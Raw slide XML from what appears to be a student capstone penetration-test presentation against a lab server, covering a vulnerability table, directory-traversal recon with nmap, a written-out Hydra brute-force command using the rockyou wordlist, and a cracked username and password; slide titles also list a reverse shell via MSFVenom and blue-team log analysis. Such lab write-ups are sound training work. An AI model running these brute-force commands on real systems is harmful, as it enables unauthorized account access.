        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="364800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128" name="Google Shape;1128;p72"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1129" name="Google Shape;1129;p72"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{4491A776-6A95-44DE-A382-5E3810DD701D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2787500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="397450">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Vulnerability</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Description</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425" anchor="ctr">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990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="767375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Website transversal</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200" i="1">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="1">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Able to move from authorized, public-facing folders and files, to hidden files and folders.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We were able to detect and access files and folders despite them being hidden.</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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="767375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute Force attacks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Able to spam password lists at a field in order to gain access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We were able to gain access to a webserver account.</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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="767375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unsecure SSH</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SSH not secured with a private key</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We were able to directly gain access through port 22 using stolen login credentials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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="767375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unsecure web-based sharing</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>The web-shared folder was easily accessed with stolen credentials</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solidFill>
                      <a:srgbClr val="DBD9E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>We were able to place and execute malicious files on the target machine</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="182875" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                    <a:lnR w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                    <a:lnT w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnT>
                    <a:lnB w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A9B7C0"/>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33"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Google Shape;1134;p73"/>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t>Exploitation: Directory Traversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p73"/>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36" name="Google Shape;1136;p73"/>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73"/>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150">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>We used KALI to do an nmap scan to find 192.168.1.105.  We put this address into Firefox and it took us to a website with several folders.  We found 192.168.1.105/company_folders/company_culture/file1.txt. The text file said please refer to 192.168.1.105/company_folders/secret_folder/</a:t>
            </a:r>
            <a:endParaRPr sz="1150">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endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1138" name="Google Shape;1138;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;p7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40" name="Google Shape;1140;p7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73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1142" name="Google Shape;1142;p73"/>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43" name="Google Shape;1143;p73"/>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44" name="Google Shape;1144;p73"/>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73"/>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192.168.1.105/company_folders/secret_folder/.  A pop up showed that this was “For ashtons eyes only”.  We assumed the username was ashton based off the naming convention the company uses.  From there we performed the hydra scan.  This can be found on the next slide. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1146" name="Google Shape;1146;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5953350" y="3765025"/>
            <a:ext cx="3049975" cy="869800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1147" name="Google Shape;1147;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5999450" y="1480575"/>
            <a:ext cx="2937800" cy="944150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1148" name="Google Shape;1148;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5999450" y="2675400"/>
            <a:ext cx="2937800" cy="340250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5999451" y="3210679"/>
            <a:ext cx="3003875" cy="27252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53"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="9168600" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="182875" rIns="274300" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: Brute Force Password Attack	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1155" name="Google Shape;1155;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="4916650"/>
            <a:ext cx="7971900" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="274300" tIns="45700" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275"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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371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Tools &amp; Processes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Discovering the secret_folder on the company share (after finding indications in the other files, including the probable username of Ashton), we used the Hydra password-cracking utility to brute-force the password.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1158" name="Google Shape;1158;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1159" name="Google Shape;1159;p7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01</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1160" name="Google Shape;1160;p7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74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1162" name="Google Shape;1162;p7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02</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1163" name="Google Shape;1163;p7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4" name="Google Shape;1164;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31542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b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">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We were able to associate a password with the username ‘ashton’ within about 1 minute.</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Username: ashton</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Password: leopoldo	</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1167" name="Google Shape;1167;p74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="6213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100">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:ea typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                  <a:sym typeface="Roboto Light"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1168" name="Google Shape;1168;p74"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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69" name="Google Shape;1169;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="3252300"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16667"/>
              <a:gd name="adj2" fmla="val 0"/>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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="3252300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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1814</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>221</Paragraphs>
  <Slides>28</Slides>
  <Notes>28</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28</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="36" baseType="lpstr">
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System Submitted by: Jack Lawton, Eric Troutman, Colin Clark, Leslie Kahler, Mekete Sugebo </vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Directory Traversal</vt:lpstr>
      <vt:lpstr>Exploitation: Brute Force Password Attack </vt:lpstr>
      <vt:lpstr>HYDRA BRUTE FORCE</vt:lpstr>
      <vt:lpstr>Exploitation: SSH Login benefits</vt:lpstr>
      <vt:lpstr>Successful ssh login</vt:lpstr>
      <vt:lpstr>Exploitation: Reverse TCP Shell</vt:lpstr>
      <vt:lpstr>MSFVenom/Meterpreter</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Indications of a Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
